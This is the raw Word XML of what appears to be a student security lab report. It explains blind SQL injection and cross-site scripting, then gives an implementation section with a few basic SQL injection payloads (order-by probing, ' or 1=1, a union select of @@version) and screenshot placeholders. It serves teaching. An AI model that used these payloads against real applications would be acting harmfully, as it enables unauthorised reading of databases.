        <w:t>Blind SQL injection vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00620884" w:rsidP="009A624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A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Many instances of SQL injection are blind vulnerabilities. This means that the application does not return the results of the SQL query or the details of any database errors within its responses. Blind vulnerabilities can still be exploited to access unauthorized data, but the techniques involved are generally more complicated and difficult to perform.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00620884" w:rsidP="009A6244">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A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Depending on the nature of the vulnerability and the database involved, the following techniques can be used to exploit blind SQL injection vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00620884" w:rsidP="009A624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A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>You can change the logic of the query to trigger a detectable difference in the application's response depending on the truth of a single condition. This might involve injecting a new condition into some Boolean logic, or conditionally triggering an error such as a divide-by-zero.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00620884" w:rsidP="009A624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A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>You can conditionally trigger a time delay in the processing of the query, allowing you to infer the truth of the condition based on the time that the application takes to respond.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00620884" w:rsidP="009A6244">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A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>You can trigger an out-of-band network interaction, using </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="009A6244">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>OAST</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> techniques. This technique is extremely powerful and works in situations where the other techniques do not. Often, you can directly </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exfiltrate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> data via the out-of-band channel, for example by placing the data into a DNS lookup for a domain that you control.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2C10" w:rsidRPr="009A6244" w:rsidRDefault="00DB2C10" w:rsidP="009A6244">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p>
    <w:p w:rsidR="00DB2C10" w:rsidRPr="00DA0AFB" w:rsidRDefault="00DB2C10" w:rsidP="009A6244">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="150" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA0AFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Cross-site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2C10" w:rsidRPr="009A6244" w:rsidRDefault="00DB2C10" w:rsidP="009A6244">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009A6244">
        <w:t>Cross-site Scripting (XSS) is a client-side code </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="009A6244">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>injection attack</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A6244">
        <w:t>. The attacker aims to execute malicious scripts in a web browser of the victim by including malicious code in a legitimate web page or web application. The actual attack occurs when the victim visits the web page or web application that executes the malicious code. The web page or web application becomes a vehicle to deliver the malicious script to the user’s browser. Vulnerable vehicles that are commonly used for Cross-site Scripting attacks are forums, message boards, and web pages that allow comments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2C10" w:rsidRPr="009A6244" w:rsidRDefault="00DB2C10" w:rsidP="009A6244">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009A6244">
        <w:t xml:space="preserve">A web page or web application is vulnerable to XSS if it uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A6244">
        <w:t>unsanitized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A6244">
        <w:t xml:space="preserve"> user input in the output that it generates. This user input must then be parsed by the victim’s browser. XSS attacks are possible in VBScript, Activ</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="009A6244">
        <w:t>eX, Flash, and even CSS. However, they are most common in JavaScript, primarily because JavaScript is fundamental to most browsing experiences.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2C10" w:rsidRPr="00620884" w:rsidRDefault="00DB2C10" w:rsidP="00DB2C10">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620884" w:rsidRPr="00620884" w:rsidRDefault="00620884" w:rsidP="00620884">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A6244" w:rsidRDefault="009A6244" w:rsidP="009A6244">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A7287" w:rsidRPr="00D228D6" w:rsidRDefault="009A7287" w:rsidP="009A6244">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D228D6" w:rsidRDefault="00D228D6" w:rsidP="00D228D6">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D228D6" w:rsidRDefault="008057C4" w:rsidP="00D228D6">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Injection Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D228D6" w:rsidRPr="00D228D6" w:rsidRDefault="008057C4" w:rsidP="00D228D6">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>1. F</w:t>
      </w:r>
      <w:r w:rsidR="00D228D6" w:rsidRPr="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ind the number of entries in table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D228D6" w:rsidRPr="00D228D6" w:rsidRDefault="00D228D6" w:rsidP="00D228D6">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="008057C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> by 1</w:t>
      </w:r>
      <w:r w:rsidR="008057C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D228D6" w:rsidRDefault="00D228D6" w:rsidP="00D228D6">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="008057C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> by6</w:t>
      </w:r>
      <w:r w:rsidR="008057C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008057C4" w:rsidRPr="008057C4" w:rsidRDefault="008057C4" w:rsidP="008057C4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>2. S</w:t>
      </w:r>
      <w:r w:rsidRPr="008057C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>elect all entries from table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008057C4" w:rsidRDefault="008057C4" w:rsidP="008057C4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008057C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>' or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008057C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008057C4" w:rsidRDefault="008057C4" w:rsidP="008057C4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ADA80FF" wp14:editId="7B935DBF">
            <wp:extent cx="48577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628650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="061B3562" wp14:editId="72C1F2F5">
            <wp:extent cx="5731510" cy="3088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88035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA76DA" w:rsidRPr="00AA76DA" w:rsidRDefault="00AA76DA" w:rsidP="00AA76DA">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA76DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA76DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">1:  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA76DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA76DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection to display all tables in database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008057C4" w:rsidRPr="008057C4" w:rsidRDefault="008057C4" w:rsidP="008057C4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>3. D</w:t>
      </w:r>
      <w:r w:rsidRPr="008057C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>atabase version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008057C4" w:rsidRDefault="008057C4" w:rsidP="008057C4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008057C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>' union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008057C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> select 1,2,@@version,4,5 #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008057C4" w:rsidRDefault="008057C4" w:rsidP="008057C4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A0D23B1" wp14:editId="54EA1032">
            <wp:extent cx="5731510" cy="1142628"/>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42628"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRPr="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
